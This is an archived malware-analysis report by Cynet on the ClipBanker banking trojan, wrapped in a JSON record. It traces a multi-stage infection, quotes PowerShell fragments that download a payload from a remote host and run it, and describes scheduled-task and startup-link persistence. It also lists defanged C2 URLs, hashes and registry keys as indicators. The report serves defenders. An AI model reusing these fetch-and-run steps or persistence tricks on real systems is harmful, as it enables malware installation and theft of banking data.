{
	"id": "2f70b1b3-b566-4155-99cd-749fcb5e43ae",
	"created_at": "2026-04-06T00:19:20.784561Z",
	"updated_at": "2026-04-10T03:21:30.38984Z",
	"deleted_at": null,
	"sha1_hash": "c2640bb1a0b9138c67054e592c7229212b2fae34",
	"title": "Threat Research Report: Clipbanker - 13 Second Attack",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 5821953,
	"plain_text": "Threat Research Report: Clipbanker - 13 Second Attack\r\nArchived: 2026-04-02 12:21:38 UTC\r\nWritten by: Max Malyutin\r\nEXECUTIVE SUMMARY\r\nIn this article, the Cynet Research team reveals a highly complex attack that runs for only 13 seconds by using\r\nseveral malwares and different tactics. From our analysis, the threat that we discovered within our investigation is\r\nname the “ClipBanker” trojan.\r\nThe attack flow contains several stages of LOLBins (Living Off the Land) abuse, masquerading, persistency,\r\nenumeration techniques, credential thieving, fileless attacks, and finally banking trojan activities.\r\nThis attack is also using Fileless techniques in order to evade from security detections. Fileless attack has been a\r\ngrowing threat since 2017 and require highly sophisticated detection and prevention tools to detect and block. The\r\nmost common Windows tools used in “Fileless” attacks are PowerShell, JS, VBA and WMI. PowerShell is a highly\r\npopular tool used for Fileless attack, because PowerShell commands can be executed natively on Windows without\r\nwriting data to disk.\r\nThe ClipBanker Trojan is known as an information stealer and spy trojan, it aims to steal and record any type of\r\nsensitive information from the infected environment such as browser history, cookies, Outlook data, Skype,\r\nTelegram, or cryptocurrency wallet account addresses. The main goal of this threat is to steal confidential\r\ninformation.\r\nThe ClipBanker uses PowerShell commands for executing malicious activities. The thing that made the ClipBanker\r\nunique is its ability to record various banking actions of the user and manipulate them for its own benefit.\r\nThe distribution method of the ClipBanker is through phishing emails or through social media posts that lure users\r\nto download malicious content.\r\nCynet 360 is protecting your assets against this type of exploit.\r\nhttps://www.cynet.com/attack-techniques-hands-on/threat-research-report-clipbanker-13-second-attack/\r\nPage 1 of 25\n\nThis is part of an extensive series of guides about Malware Protection\r\nMITRE ATT\u0026CK\r\nThe attack flow that is described below contains several known MITRE tactics and techniques.\r\nThe strategic goal of the attacker is to steal information. However, in order to do it, the attacker must go through\r\nseveral steps to complete his malicious activity and successfully gain access to the sensitive data from the\r\ncompromised environment.\r\nIn this case, the attacker begins with trying to gain Initial Access (TA0001) to the victim’s environment, in order to\r\ngain an initial foothold on the victim machine. Then, they will use several tactics such as Execution (TA0002), in\r\norder to execute the malicious code, and Persistency (TA0003), in order to gain persistency on the victim system.\r\nThe attackers will often need to gain access to the victim’s system in order to keep the malicious activity going and\r\nto gain access to sensitive information from the infected environment. Such sensitive information includes browser\r\nhistory, cookies, Outlook data, Skype, Telegram, or cryptocurrency wallet account addresses. The attackers will\r\nthen need to accomplish the Collection (TA0009) tactic. This means that the attacker will need to use a Defense\r\nEvasion (TA0005) tactics to bypass security application systems from detecting the malicious activity. In order to\r\nestablish a connection, the attacker will also use a Command and Control (TA0011) tactics to receive instruction\r\ncommands from a remote server and keep preforming the attack flow.\r\nhttps://www.cynet.com/attack-techniques-hands-on/threat-research-report-clipbanker-13-second-attack/\r\nPage 2 of 25\n\n13 SECONDS ATTACK FLOW\r\nAttack started at 7:47:43.000 PM:\r\nFirst Trojan Downloader:\r\nCynet 360 platform has detected a Trojan Downloader. A downloader is a program that downloads another malware\r\ncomponent from the network by connecting to a Command and Control server.\r\nThe Trojan Downloader was detected as a child process of RegAsm.exe binary. RegAsm is the Assembly\r\nRegistration tool that reads the metadata within an assembly and adds the necessary entries to the registry, which\r\nallows COM clients to create .NET Framework classes transparently (Microsoft Developer Network). RegAsm\r\n(LOLBin) can be used to perform malicious actions such as PE file execution in order to bypass security\r\napplications.\r\nhttps://www.cynet.com/attack-techniques-hands-on/threat-research-report-clipbanker-13-second-attack/\r\nPage 3 of 25\n\nAs you can see in the screenshot below – Cynet has detected EguiProxy.exe (the Trojan Downloader) that was\r\nlaunched by RegAsm.exe (LOLBin):\r\nFirst Downloader: EguiProxy.exe\r\nMD5: f70428c34a100f9b3a6dbe58aea05def\r\nSHA-1: 9dd57f78f6f488bc7e96b592a7201040049f4933\r\nSHA-256: 4a471f05c7624238ef374bbf3af4eeb2abc20f87579ecdbeefea61356e23ae69\r\nSSDEEP:\r\n96:Iz3j1+n7W7AtmLykrFVEODJtutwc79LaB+UMWmLgt3x3kJ+iGczNt:mQ74OhkphDEwq9LaB+UMWmLgt32gm\r\nSecond Trojan Downloader:\r\nThen, the Trojan Downloader downloads another malware from “hxxp://bzqopgtera[.]xyz/” that will be used as an\r\nInjector/Downloader and will execute a new malware from \\AppData\\Local\\Temp\\ directory:\r\nhttps://www.cynet.com/attack-techniques-hands-on/threat-research-report-clipbanker-13-second-attack/\r\nPage 4 of 25\n\nSecond Downloader: 1849226900.exe\r\nMD5: e5e13f095613837ff741cf9fb2b68eb0\r\nSHA-1: e7b63fbd6dc176fa29e208dc1de083c882a6ef01\r\nSha256: 1f0ddf5088ac75862fe1d1c4f11f9c39645eee1e4acc938a1f66f14dfc5d5288\r\nSSDeep:\r\n12288:D9ciEWzp4fqhCC77upiLcRGjbWWkKkc9Tm4RtxQBWUX2Fqmvu5UshghN:3jcqhJipiwojbWWkY9Tjm2eyh\r\nThe second downloader also initiated a network communication to the same Command and Control server as\r\nmentioned above (the same C\u0026C of the first downloader).\r\nThe main purpose of this second trojan is to execute a malicious PowerShell command by running CMD.exe. It is\r\nworth mentioning that the cmd.exe instance was executed from syswow64 directory. This kind of activity is similar\r\nwith many other malicious activities the Cynet Research has investigated recently. The CMD instance had run with\r\n/c argument (which allows the CMD to run and terminate immediately thereafter) in order to execute the malicious\r\nPowerShell command described below.\r\nThe PowerShell command had ran with the following parameters:\r\n-w 1 – WindowStyle Hidden, hide the PowerShell window.\r\n -e – EncodedCommand, allow to encode the command with base 64 format.\r\nAfter decoding the malicious PowerShell base64 command, we have figured that the attack switched from file-based attack to a Fileless attack. In the screenshot below, you may see that the command contains two interesting\r\nparts:\r\nhttps://www.cynet.com/attack-techniques-hands-on/threat-research-report-clipbanker-13-second-attack/\r\nPage 5 of 25\n\n1. The first part of the PowerShell command is the $thdTask variable, which contains another base64 string.\r\nAfter encoding the base 64 command, we got the following command:\r\nThe above command is using “System.Net.WebClient” and “DownloadString” to initiate network connectivity to\r\ngitlab.com (hxxps://gitlab[.]com/UL9gbzuP37/rt/snippets/1956305/raw) and to download the cs.exe file to \\temp\\\r\ndirectory.\r\nWhen trying to access the malicious URL, we saw that it contains a large base64 string, as you can see below:\r\nAfter decoding the base64 string, we have figured that the base64 string is basically a PE file (an MZ file) that will\r\nbe downloaded to $env:temp (environment variable of the TEMP directory C:\\Users\\user\\AppData\\Local\\Tem) the\r\npayload as “cs.exe”:\r\n[IO.File]::WriteAllBytes(“$env:temp\\cs.exe”, [Convert]::FromBase64String($base64string))\r\nFinally, the payload executes by start-process command.\r\nstart-process “$env:temp\\cs.exe”\r\nhttps://www.cynet.com/attack-techniques-hands-on/threat-research-report-clipbanker-13-second-attack/\r\nPage 6 of 25\n\nIn order to understand the malicious purpose of this payload we have to deep dive and analyze it by static and\r\ndynamic analysis.\r\n1. The second part of the command sets a new value to the “HKCU\\Sofatwarte\\cr” registry key – which is\r\nfurther described in the technical analysis\r\nTechnical Analysis\r\nAfter downloading and investigating the cs.exe (the payload we extracted above), we have concluded that this\r\npayload is the said Trojan Banker that aims to steal banking data from infected machines.\r\nFile name: cs.exe\r\nMD5: 884da153fa3617c79a67b1941e4493ed\r\nSHA-1: e1346bc15d103f0bb96d3f93a1a042f030134c8b\r\nSha256: e09013a2ac876746a5143f8ee8f997b06688b71adc05ddb81aeb9a1a69fa6f88\r\nSSDeep:\r\n6144:Y4lCfqy7+mdXzEQj0oFIxRr4VsXR7P9/Z2Q+5AOh1faY:zlCfqy7+mdXzEQnYr4VsXRFf+5xaY\r\nStatic analysis\r\nhttps://www.cynet.com/attack-techniques-hands-on/threat-research-report-clipbanker-13-second-attack/\r\nPage 7 of 25\n\nThe Trojan Banker’s static metadata and history (from VirusTotal.com)\r\nFrom the static analysis of the cs.exe payload we have found some hints about the malicious activity and basic\r\nfunctionality that it will soon execute and use on the compromised environment.\r\nThe following screenshot of the malicious file can show that the sections of the files are not packed or\r\nencrypted. We can also see the assembly code and start figuring out the malicious context and purpose of this\r\nTrojan Banker:\r\nhttps://www.cynet.com/attack-techniques-hands-on/threat-research-report-clipbanker-13-second-attack/\r\nPage 8 of 25\n\nThe first step in understanding the functionality of the payload, then will be to check the imports and\r\nthe API calls that have been used by the payload.\r\nThe main functions that we discovered are:\r\nCreateProcess: this function allows the attacker to create a new process and its primary thread. The new\r\nprocess runs in the security context of calling the process. Most of the time, the attackers will use this API\r\ncall to execute the malicious process:\r\nCreateDirectory: this function allows the attacker to create a new directory. If the underlying file system\r\nsupports security on files and directories, the function applies a specified security descriptor to the new\r\ndirectory. Usually, the attackers will use this API call to create the directory where the\r\nhttps://www.cynet.com/attack-techniques-hands-on/threat-research-report-clipbanker-13-second-attack/\r\nPage 9 of 25\n\nmalicious component will be stored in order to gain persistency on the victim’s host.\r\nWriteFile: this function allows the attacker to write data to the specified file or input/output (I/O) device.\r\nUsually, the adversaries will use this API call to create (write) a malicious file component. It also can be\r\nused for persistency and post-exploitation methods.\r\nGetCommandLine: this function allows the attacker to retrieve the command-line string for the current\r\nprocess. Attackers use this API call to execute (run command line) malicious code. It can also be used for\r\nFileless and post-exploitation methods.\r\nhttps://www.cynet.com/attack-techniques-hands-on/threat-research-report-clipbanker-13-second-attack/\r\nPage 10 of 25\n\nAll the above-mentioned API calls are associated with Kerenel32.dll. This DLL exports functions\r\nthat relate to filesystem operations, hardware, and processes.\r\nThe next interesting functionality that is used by the below API functions implies that the attacker may have the\r\nability to hook, record, and steal the clipboard data which can contains sensitive information (usernames,\r\npasswords, etc.). The attacker used USER.DLL to perform a keyboard monitoring (keylogging).\r\nThe final API function that we have covered in this section is the GetUserName function that can be used by the\r\nattacker for enumeration and discovering actions.\r\nhttps://www.cynet.com/attack-techniques-hands-on/threat-research-report-clipbanker-13-second-attack/\r\nPage 11 of 25\n\nAfter discovering and understanding the functionality of the cs.exe payload, we have exported the strings from the\r\npayload. The stings are good indicators for the malicious actions that the malware will perform, which will\r\neventually lead us to new hints about the attack stages of the Trojan Banker:\r\nThe main stings we have investigated are the following:\r\nCreation of a new file (hysvc.exe) in the ProgamData directory (this file is created by using WinAPI).\r\nhttps://www.cynet.com/attack-techniques-hands-on/threat-research-report-clipbanker-13-second-attack/\r\nPage 12 of 25\n\nManipulation of the StartUp directory (can be used for persistence).\r\nExecution of CMD.\r\nCreation of Scheduled Task (can be used for Persistence) to run the new hysvc.exe file.\r\nCreation of LNK file that is linked to the new hysvc.exe file.\r\nExecution of a base64 PowerShell command.\r\nIn order to understand the above-mentioned strings, we looked at the assembly code by using IDA.\r\nThe first block containing an interesting offset that was discovered and analyzed is the aCProgramdataHy that is\r\nassociated with the new payload that will be created in the ProgamData directory.\r\nThe second block showed a few other interesting offsets:\r\naCMDCTimeoutT4\r\naCMDSchtaskFC\r\naMKlinkCProgram\r\naPowershellW1Ex\r\nhttps://www.cynet.com/attack-techniques-hands-on/threat-research-report-clipbanker-13-second-attack/\r\nPage 13 of 25\n\nThe aCMDCTimeoutT4 offset contains a CMD command line that run a “timeout /t 4” that pauses the command\r\nprocessor for 4 seconds before launching the CMD process again. This defense evasion technique is being used to\r\nprevent any detection by security application and traditional Anti-Virus vendors.\r\nThe aCMDSchtaskFC offset contains another CMD command line that will run a “schtasks” for creating a\r\nhttps://www.cynet.com/attack-techniques-hands-on/threat-research-report-clipbanker-13-second-attack/\r\nPage 14 of 25\n\nscheduled task on the compromised host. The name of the schedule task will be “GoogleChromUpdateTask” (/tn –\r\ntaskname ) and the task is scheduled to run hysvc.exe every 1 hour (/sc – schedule).\r\nThe aMKlinkCProgram offset contains a “mklink” command that will create a link (.LNK) file in the StartUp\r\ndirectory that will be linked to the hysvc.exe file.\r\nThe aPowershellW1Ex offset contains a base64 PowerShell command that will be executed by the main payload\r\n(cs.exe).\r\nAfter preforming a static analysis and code analysis we wil know move to execute the cs.exe payload and preform a\r\nDynamic/Behavior analysis.\r\nBehavior Analysis\r\nOnce we launched the payload, we immediately saw the following process tree:\r\nAs we learned from the static analysis, the CreateProcess API function will execute a CMD instance\r\nand create a scheduled task:\r\nCMD Timeout command:\r\nhttps://www.cynet.com/attack-techniques-hands-on/threat-research-report-clipbanker-13-second-attack/\r\nPage 15 of 25\n\nschtasks command:\r\nIn order to gain persistency on the compromised host the attacker created a schedule task in the Task Scheduler.\r\nMoreover, the attacker tried to masquerade it with a legitimate name of “GoogleChromUpdateTask” as we can see\r\nin the screenshot below:\r\nThe task information shows that it run the file every 3 hours:\r\nhttps://www.cynet.com/attack-techniques-hands-on/threat-research-report-clipbanker-13-second-attack/\r\nPage 16 of 25\n\nThe CreateFile and CreateDirectory functions create a new payload (hysvc.exe) in the PrgramData directory:\r\nAfter checking the hash of the new hysvc.exe payload, we have found that it is the same file as the original cs.exe\r\npayload. Thus, the initial trojan just copied itself to a new location:\r\nAfter creating the second payload (hysvc.exe) and a scheduled task to run this payload, the initial payload (cs.exe)\r\nis launching PowerShell in order to run an encoded malicious command:\r\nhttps://www.cynet.com/attack-techniques-hands-on/threat-research-report-clipbanker-13-second-attack/\r\nPage 17 of 25\n\nThe decoded command, as shown above, has used a Com-Object of “Wscript.Shell” to create a shortcut file\r\n(LNK) in the StartUp directory which is linked to the hysvc.exe payload. This is basically an attempt to use a\r\nsecond persistence technique for the payload to run every time the victim reboots the compromised\r\nmachine, by automatically executing the LNK file from the startup:\r\n“AppData\\Romming\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp”\r\nhttps://www.cynet.com/attack-techniques-hands-on/threat-research-report-clipbanker-13-second-attack/\r\nPage 18 of 25\n\nThe LNK file is linked to the trojan Banker (hysvc.exe) which is now located in the ProgramData directory.\r\nMemory context of the payload:\r\nhttps://www.cynet.com/attack-techniques-hands-on/threat-research-report-clipbanker-13-second-attack/\r\nPage 19 of 25\n\nAfter we finished the investigation and analyzed the trojan banker, we can go back to the second part of the first\r\nPowerShell Command.\r\nThe second part of the command sets a new value to the “HKCU\\Sofatwarte\\cr” registry key that related\r\nto the $thTask variable which contains the binary of the trojan Banker that we have analyzed above.\r\nIt also creates a scheduled task with CMD instance and named it “Update Shell”. The task will execute the\r\nPowerShell command in base 64 format.\r\nAfter decoding the base 64 command, we have figured that it will invoke the “HKCU\\Sofatwarte\\cr” value\r\nwhich means that the trojan Banker’s binary (hysvc.exe) will be executed by the PowerShell command directly\r\nfrom the registry:\r\nhttps://www.cynet.com/attack-techniques-hands-on/threat-research-report-clipbanker-13-second-attack/\r\nPage 20 of 25\n\nIn parallel, the downloader “1849226900.exe” which was responsible for downloading the main payload (cs.exe),\r\nexecutes another CMD instance in order to execute an additional PowerShell command:\r\nAfter decoding the PowerShell command, we discovered the following:\r\nThe first part is the $K variable that contains a base 64 command.\r\nAfter decoding the command, we see that it launchs a pure fileless attack that run from the PowerShell virtual\r\nmemory. The command initiates network communication to the following URL:\r\n“hxxps://asq.d6shiiwz[.]pw/win/ins/checking[.]ps1” in order to invoke the content of the “checking.ps1” script.\r\nThis activity happened by the IEX (Invoke-Expression) cmdlet that executes the content of the PS1 file by using the\r\nDownladString method.\r\nUnfortunately, the URL nolonger exists and when we have tried to access the URL, we get no response:\r\nhttps://www.cynet.com/attack-techniques-hands-on/threat-research-report-clipbanker-13-second-attack/\r\nPage 21 of 25\n\nIn order to verify that the malicious URL does not exist, we have tried to run a CURL command. In some of the\r\ncases attacker can fake the HTML page to show no response, while there is active communication to the malicious\r\ndomain.\r\nIn the second part of the PowerShell command, it sets a new value in the “HKCU:\\Sofatware” registry key. The\r\nvalue name is “kumi” and it contains the $k variable, which means it will execute the malicious PS1 script content.\r\nFurthermore, it will create a schedule task named: “OneDrive SyncTask”. The task will execute a PowerShell\r\ncommand.\r\nIn order to understand what the purpose of the command, we have decoded the base 64 command:\r\nThe command simply executes by the IEX cmdlet the kumi value which contain the malicious PS1 script.\r\nAttack ended at 7:47:56.000 PM (13 seconds after it executed)\r\nINDICATORS OF COMPROMISE\r\nhttps://www.cynet.com/attack-techniques-hands-on/threat-research-report-clipbanker-13-second-attack/\r\nPage 22 of 25\n\nType Indicator\r\nRegistry\r\nHKCU:\\Sofatware (value – Kumi)\r\nHKCU\\Sofatwarte\\cr\r\nSchedule Task\r\nOneDrive SyncTask\r\nGoogleChromUpdateTask\r\nUpdate Shell\r\nSHA256\r\n4a471f05c7624238ef374bbf3af4eeb2abc20f87579ecdbeefea61356e23ae69\r\n1f0ddf5088ac75862fe1d1c4f11f9c39645eee1e4acc938a1f66f14dfc5d5288\r\ne09013a2ac876746a5143f8ee8f997b06688b71adc05ddb81aeb9a1a69fa6f88\r\nURL\r\nhxxps://asq.d6shiiwz[.]pw/win/ins/checking[.]ps1\r\nhxxps://gitlab[.]com/UL9gbzuP37/rt/snippets/1956305/raw\r\nhxxp://bzqopgtera[.]xyz/\r\nConclusion\r\nThe Cynet Research Team has analyzed and investigated different threats and malware using various tools and\r\ntechniques. Cynet’s seasoned security experts are familiar with the newest attacks vectors and techniques that exist\r\nin the wild.\r\nCynet 360 customers are fully protected from these kinds of threats and have full visibility over their protected\r\nassets. Cynet has various behavioral and heuristics capabilities designed to detect and prevent advanced threats like\r\nthe one described in this report.\r\nThe Cynet 360 solution gives our customers the ability to control and manage cyber security incidents, to perform\r\nforensic analysis on infected environments, and to run remote actions on the infected hosts in order to mitigate the\r\nthreat. On top of that, we have our CyOps team which is monitoring our customers’ environments 24/7/365.\r\nContact Cynet CyOps\r\n(Cynet Security Operations Center)\r\nThe Cynet CyOps available to clients for any issues 24/7, questions or comments related to Cynet 360. For\r\nadditional information, you may contact us directly at:\r\nPhone (US): +1-347-474-0048\r\nhttps://www.cynet.com/attack-techniques-hands-on/threat-research-report-clipbanker-13-second-attack/\r\nPage 23 of 25\n\nPhone (EU): +44-203-290-9051\r\nPhone (IL): +972-72-336-9736\r\nCyOps Email: soc@cynet.com\r\nTips From Expert\r\nIn my experience, here are tips that can help you better defend against advanced, multi-stage attacks like the\r\nClipBanker Trojan:\r\n1. Harden Against LOLBin Abuse: Restricting the use of trusted binaries and implementing application\r\ncontrol policies helps prevent attackers from abusing legitimate tools to execute malicious code.\r\n2. Deep Monitoring of PowerShell Execution: Monitoring PowerShell activity for abnormal usage and\r\ntracking script execution provides valuable insights into potential malicious activity.\r\n3. Proactive URL Scanning for Malicious Domains: Continuously scanning and blacklisting suspicious\r\ndomains helps prevent users from accessing malicious websites and downloading malicious files.\r\n4. Enforce Secure Email Gateways: Strengthening email security helps detect and block phishing attempts,\r\nwhich are often used to deliver malware like ClipBanker.\r\n5. Deploy Memory Analysis Tools for Early Detection: Memory-based analysis can catch malware in action,\r\neven when there are no files written to disk, allowing for earlier detection and response.\r\nhttps://www.cynet.com/attack-techniques-hands-on/threat-research-report-clipbanker-13-second-attack/\r\nPage 24 of 25\n\nAviad Hasnis is the Chief Technology Officer at Cynet.\r\nHe brings a strong background in developing cutting edge technologies that have had a major impact on the security\r\nof the State of Israel. At Cynet, Aviad continues to lead extensive cybersecurity research projects and drive\r\ninnovation forward.\r\nSource: https://www.cynet.com/attack-techniques-hands-on/threat-research-report-clipbanker-13-second-attack/\r\nhttps://www.cynet.com/attack-techniques-hands-on/threat-research-report-clipbanker-13-second-attack/\r\nPage 25 of 25",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.cynet.com/attack-techniques-hands-on/threat-research-report-clipbanker-13-second-attack/"
	],
	"report_names": [
		"threat-research-report-clipbanker-13-second-attack"
	],
	"threat_actors": [],
	"ts_created_at": 1775434760,
	"ts_updated_at": 1775791290,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c2640bb1a0b9138c67054e592c7229212b2fae34.pdf",
		"text": "https://archive.orkl.eu/c2640bb1a0b9138c67054e592c7229212b2fae34.txt",
		"img": "https://archive.orkl.eu/c2640bb1a0b9138c67054e592c7229212b2fae34.jpg"
	}
}